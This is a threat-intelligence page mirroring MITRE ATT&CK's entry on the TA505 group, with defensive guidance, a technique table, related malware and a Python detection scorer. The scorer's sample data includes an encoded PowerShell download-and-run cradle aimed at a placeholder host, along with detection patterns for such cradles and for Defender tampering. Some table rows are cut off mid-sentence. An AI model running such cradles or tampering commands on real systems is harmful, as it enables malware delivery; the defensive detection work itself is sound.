G0092: TA505
Analyst context for executives and security teams
TA505 matters because MITRE describes it as a long-running cyber criminal group known for frequently changing malware, influencing criminal malware distribution, and ransomware campaigns involving Clop. For leaders, the key issue is not a single indicator list; it is whether the organization can detect and respond when tooling changes across downloaders, RATs, credential theft, Active Directory discovery, and ransomware-related activity.
Executive priority
Prioritize TA505 as a readiness test for ransomware resilience, identity security, and SOC adaptability. Executives should ask whether endpoint, scripting, credential, and Active Directory telemetry are retained and usable during an incident; whether incident response can handle fast-changing malware families; and whether backup, containment, and evidence-collection processes are proven before ransomware pressure occurs.
Technical view
ATT&CK provides no official detection text for this group, so coverage should be validated through the related software and techniques. The relationship set is strongly Windows-oriented and includes Mimikatz, Net, Cobalt Strike, PowerSploit, TrickBot, Azorult, FlawedAmmyy, ServHelper, FlawedGrace, Dridex, Get2, SDBbot, BloodHound, AdFind, Clop, and Amadey. Related techniques include PowerShell, Windows Command Shell, Visual Basic, JavaScript, software packing, command obfuscation, encrypted or encoded files, and DLL injection. SOC teams should test visibility across script execution, command lines, process lineage, memory/process behavior, AD enumeration, credential-access tooling, downloader/backdoor activity, and ransomware-family alert handling.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially PowerShell, cmd, Visual Basic, and JavaScript execution
- PowerShell script block, module, and operational logs where available
- Windows security and endpoint events related to credential dumping tools and suspicious access to credential material
- Active Directory query and enumeration evidence associated with tools such as BloodHound and AdFind
- Network connections and proxy/DNS records for downloader, RAT, and backdoor communications
Detection direction
- Because MITRE supplies no official detection guidance, base validation on relationship-driven behaviors rather than group name matching.
- Tune for suspicious combinations: scripting or shell execution followed by downloader/RAT behavior, AD discovery, credential tooling, lateral-use utilities, or ransomware-like file activity.
- Account for obfuscation: packed files, encoded content, and obfuscated commands can reduce signature-only effectiveness.
- Separate legitimate administration from abuse of tools such as Net, PowerShell, Cobalt Strike-like behavior, BloodHound, and AdFind by using user role, host role, execution context, parent process, timing, and change-ticket context.
- Validate Windows endpoint depth first, since most related software and several techniques are Windows-focused, while noting some related techniques and Cobalt Strike list Linux/macOS as possible platforms.
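The telemetry and detection directions above, worked as an added example that is not part of this page or of MITRE's material: a small Python scorer run over constructed process-creation events (Sysmon event 1 / Windows 4688-style fields). It decodes `-EncodedCommand` PowerShell before matching (the obfuscation point), weights parent/child lineage such as an Office application spawning a script host, flags the AD-enumeration tools the page names, and downgrades AdFind activity when user role, host role and a change ticket say it is expected work. The field names, rule weights, threshold, the role/host allow-lists, the `change_ticket` flag and all sample events are assumptions made for the example.

```python
"""Added example (not from the page or MITRE): score constructed process-creation events
for the TA505-style behaviour chains the page lists, using role/host/change-ticket
context to separate expected administration from abuse."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str                  # parent image name (process lineage)
    image: str                   # executing image name
    cmdline: str
    change_ticket: bool = False  # hypothetical field joined from a ticketing/CMDB system


# Hypothetical role context: accounts and hosts where AD enumeration is expected work.
EXPECTED_AD_AUDIT_USERS = {"corp\\svc-adaudit"}
EXPECTED_AD_AUDIT_HOSTS = {"adm-jump01"}

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SIGNED_PROXIES = {"rundll32.exe", "msiexec.exe"}   # T1218.011 / T1218.007 on the page
AD_RECON_TOOLS = {"adfind.exe", "sharphound.exe"}  # T1588.002 tooling named on the page

ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I)
DEFENDER_TAMPER = re.compile(r"disablerealtimemonitoring|disableantispyware", re.I)


def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand (T1027.010), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return [(rule, weight)] for one event; context downgrades expected admin activity."""
    hits = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS | SIGNED_PROXIES:
        hits.append(("office_app_spawns_script_or_proxy", 4))  # malicious-document chain
    decoded = decode_encoded_powershell(ev.cmdline)
    if decoded is not None:
        hits.append(("encoded_powershell", 2))
        if DOWNLOAD_CRADLE.search(decoded):
            hits.append(("encoded_download_cradle", 3))       # T1059.001 download-and-run
    if DEFENDER_TAMPER.search(decoded or ev.cmdline):
        hits.append(("defender_tamper", 4))                   # T1685 / T1112 on the page
    if image in AD_RECON_TOOLS:
        expected = (ev.user.lower() in EXPECTED_AD_AUDIT_USERS
                    and ev.host.lower() in EXPECTED_AD_AUDIT_HOSTS and ev.change_ticket)
        hits.append(("ad_recon_expected", 0) if expected else ("ad_recon_tool", 3))
        if parent in SCRIPT_HOSTS and not expected:
            hits.append(("script_host_spawns_ad_recon", 2))   # scripting followed by AD discovery
    return hits


def correlate(events, threshold=7):
    """Aggregate per host (events in time order); alert when the chain score reaches threshold."""
    result = {}
    for ev in events:
        entry = result.setdefault(ev.host.lower(), {"score": 0, "chain": []})
        for rule, weight in score_event(ev):
            entry["score"] += weight
            entry["chain"].append(rule)
    for entry in result.values():
        entry["alert"] = entry["score"] >= threshold
    return result


def encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); example.invalid is a reserved placeholder.
SAMPLE_EVENTS = [
    ProcEvent("WS-042", "corp\\jdoe", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc " + encode_ps(
                  "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")),
    ProcEvent("WS-042", "corp\\jdoe", "powershell.exe", "adfind.exe",
              "adfind.exe -f objectcategory=computer"),
    ProcEvent("ADM-JUMP01", "corp\\svc-adaudit", "cmd.exe", "adfind.exe",
              "adfind.exe -f objectcategory=computer", change_ticket=True),
    ProcEvent("WS-017", "corp\\asmith", "explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for host, entry in correlate(SAMPLE_EVENTS).items():
        print(host, entry)
```

Run stand-alone, the workstation that had Word spawn encoded PowerShell and then AdFind crosses the threshold, the jump host running the same AdFind command under an audit account with a ticket does not, and the inventory script scores nothing. The decode step is what makes the command-line rules see through base64 encoding; a signature matching only the raw command line would miss the download cradle entirely. In production the role and ticket context would be joined from the identity provider and ticketing system rather than hard-coded sets.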
Mitigation priorities
- Strengthen identity and Active Directory hygiene first: reduce excessive privileges, monitor administrative activity, and prepare containment procedures for credential compromise.
- Harden scripting and command execution controls where operationally feasible, including PowerShell governance and logging.
- Improve endpoint prevention and detection for packed/encoded files, suspicious DLL injection, credential dumping, and unauthorized remote access tooling.
- Prepare ransomware resilience: tested backups, restore procedures, segmentation, and incident decision playbooks tied to Clop-related readiness without assuming current exposure.
- Maintain threat intelligence updates for the listed aliases and related malware/tools, but avoid relying only on static indicators because the group is described as frequently changing malware.
Analyst notes and limits
Aliases supplied by ATT&CK include TA505, Hive0065, Spandex Tempest, and CHIMBORAZO. The most useful defensive framing is a coverage assessment across related tooling and behaviors, not a claim that any one indicator proves TA505 activity. Relationship context highlights credential dumping, AD reconnaissance, scripting, obfuscation, remote access tools, downloaders, backdoors, and ransomware.
Platforms and tactics are not specified on the intrusion-set object itself, and official detection is not provided. Platform and behavior guidance here is inferred only from supplied related software and technique fields. Local telemetry, asset criticality, business process exposure, and confirmed incident evidence are required before assessing organizational exposure or attribution.
TA505
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1087.003 | Email Account Sub-technique | TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server. (Citation: Trend Micro TA505 June 2019) |
| Enterprise | T1583.001 | Domains Sub-technique | TA505 has registered domains to impersonate services such as Dropbox to distribute malware. (Citation: Korean FSI TA505 2020) |
| Enterprise | T1553.005 | Mark-of-the-Web Bypass Sub-technique | TA505 has used .iso files to deploy malicious .lnk files. (Citation: TrendMicro TA505 Aug 2019) |
| Enterprise | T1218.007 | Msiexec Sub-technique | TA505 has used |
| Enterprise | T1112 | Modify Registry | TA505 has used malware to disable Windows Defender through modification of the Registry. (Citation: Korean FSI TA505 2020) |
| Enterprise | T1588.002 | Tool Sub-technique | TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit. (Citation: NCC Group TA505) |
| Enterprise | T1204.002 | Malicious File Sub-technique | TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Proofpoint TA505 Jan 2019) (Citation: Cybereason TA505 April 2019) (Citation: ProofPoint SettingContent-ms July 2018) (Citation: Proofpoint TA505 Mar 2018) (Citation: Trend Micro TA505 June 2019) (Citation: Proofpoint TA505 October 2019) (Citation: IBM TA505 April 2020) |
| Enterprise | T1568.001 | Fast Flux DNS Sub-technique | TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs. (Citation: Trend Micro TA505 June 2019) |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | TA505 has password-protected malicious Word documents. (Citation: Proofpoint TA505 Sep 2017) |
| Enterprise | T1027.002 | Software Packing Sub-technique | TA505 has used UPX to obscure malicious code. (Citation: IBM TA505 April 2020) |
| Enterprise | T1552.001 | Credentials In Files Sub-technique | TA505 has used malware to gather credentials from FTP clients and Outlook. (Citation: Proofpoint TA505 Sep 2017) |
| Enterprise | T1059.005 | Visual Basic Sub-technique | TA505 has used VBS for code execution. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Trend Micro TA505 June 2019) (Citation: IBM TA505 April 2020) |
| Enterprise | T1059.007 | JavaScript Sub-technique | TA505 has used JavaScript for code execution. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 June 2018) |
| Enterprise | T1204.001 | Malicious Link Sub-technique | TA505 has used lures to get users to click links in emails and attachments. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Proofpoint TA505 Jan 2019) (Citation: Cybereason TA505 April 2019) (Citation: ProofPoint SettingContent-ms July 2018) (Citation: Proofpoint TA505 Mar 2018) (Citation: Trend Micro TA505 June 2019) (Citation: Proofpoint TA505 October 2019) |
| Enterprise | T1608.001 | Upload Malware Sub-technique | TA505 has staged malware on actor-controlled domains. (Citation: Korean FSI TA505 2020) |
| Enterprise | T1218.011 | Rundll32 Sub-technique | TA505 has leveraged |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | TA505 has decrypted packed DLLs with an XOR key. (Citation: NCC Group TA505) |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | TA505 has used malware to gather credentials from Internet Explorer. (Citation: Proofpoint TA505 Sep 2017) |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | TA505 has used base64 encoded PowerShell commands. (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) |
| Enterprise | T1069 | Permission Groups Discovery | |
| Enterprise | T1105 | Ingress Tool Transfer | TA505 has downloaded additional malware to execute on victim systems. (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) (Citation: ProofPoint SettingContent-ms July 2018) |
| Enterprise | T1588.001 | Malware Sub-technique | TA505 has used malware such as Azorult and Cobalt Strike in their operations. (Citation: NCC Group TA505) |
| Enterprise | T1078.002 | Domain Accounts Sub-technique | TA505 has used stolen domain admin accounts to compromise additional hosts. (Citation: IBM TA505 April 2020) |
| Enterprise | T1553.002 | Code Signing Sub-technique | TA505 has signed payloads with code signing certificates from Thawte and Sectigo. (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) (Citation: Trend Micro TA505 June 2019) |
| Enterprise | T1486 | Data Encrypted for Impact | |
| Enterprise | T1059.001 | PowerShell Sub-technique | TA505 has used PowerShell to download and execute malware and reconnaissance scripts. (Citation: Proofpoint TA505 Sep 2017) (Citation: ProofPoint SettingContent-ms July 2018) (Citation: Cybereason TA505 April 2019) (Citation: Deep Instinct TA505 Apr 2019) |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | TA505 has used spearphishing emails with malicious attachments to initially compromise victims. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 June 2018) (Citation: Proofpoint TA505 Jan 2019) (Citation: Cybereason TA505 April 2019) (Citation: ProofPoint SettingContent-ms July 2018) (Citation: Proofpoint TA505 Mar 2018) (Citation: Trend Micro TA505 June 2019) (Citation: Proofpoint TA505 October 2019) (Citation: IBM TA505 April 2020) |
| Enterprise | T1106 | Native API | TA505 has deployed payloads that use Windows API calls on a compromised host. (Citation: Korean FSI TA505 2020) |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | TA505 has sent spearphishing emails containing malicious links. (Citation: Proofpoint TA505 Sep 2017) (Citation: Proofpoint TA505 Jan 2019) (Citation: Trend Micro TA505 June 2019) (Citation: Proofpoint TA505 October 2019) |
| Enterprise | T1685 | Disable or Modify Tools | TA505 has used malware to disable Windows Defender. (Citation: Korean FSI TA505 2020) |
| Enterprise | T1559.002 | Dynamic Data Exchange Sub-technique | TA505 has leveraged malicious Word documents that abused DDE. (Citation: Proofpoint TA505 June 2018) |
| Enterprise | T1055.001 | Dynamic-link Library Injection Sub-technique | TA505 has been seen injecting a DLL into winword.exe. (Citation: IBM TA505 April 2020) |
| Enterprise | T1071.001 | Web Protocols Sub-technique | TA505 has used HTTP to communicate with C2 nodes. (Citation: IBM TA505 April 2020) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | TA505 has executed commands using |
Groups, software, and campaigns
S0552: AdFind
S0611: Clop
Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[1][2][3]
S0344: Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [1][2]
S0381: FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[1]
S0002: Mimikatz
S0384: Dridex
Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[1][2][3]
S0266: TrickBot
TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[1][2][3][4]
S0460: Get2
Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[1]
S0383: FlawedGrace
FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[1]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0382: ServHelper
ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[1]
S0521: BloodHound
BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[1][2][3]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 3.0 | | Current bundle | 7fb924ac7a47… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Proofpoint TA505 Sep 2017: Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.
- [2] Proofpoint TA505 June 2018: Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.
- [3] Proofpoint TA505 Jan 2019: Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
- [4] NCC Group TA505: Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.
- [5] Korean FSI TA505 2020: Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
- [6] CHIMBORAZO (alias): (Citation: Microsoft Threat Actor Naming July 2023)
- [7] Hive0065 (alias): (Citation: IBM TA505 April 2020)
- [8] IBM TA505 April 2020: Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
- [9] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [10] Spandex Tempest (alias): (Citation: Microsoft Threat Actor Naming July 2023)
- [11] mitre-attack G0092
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.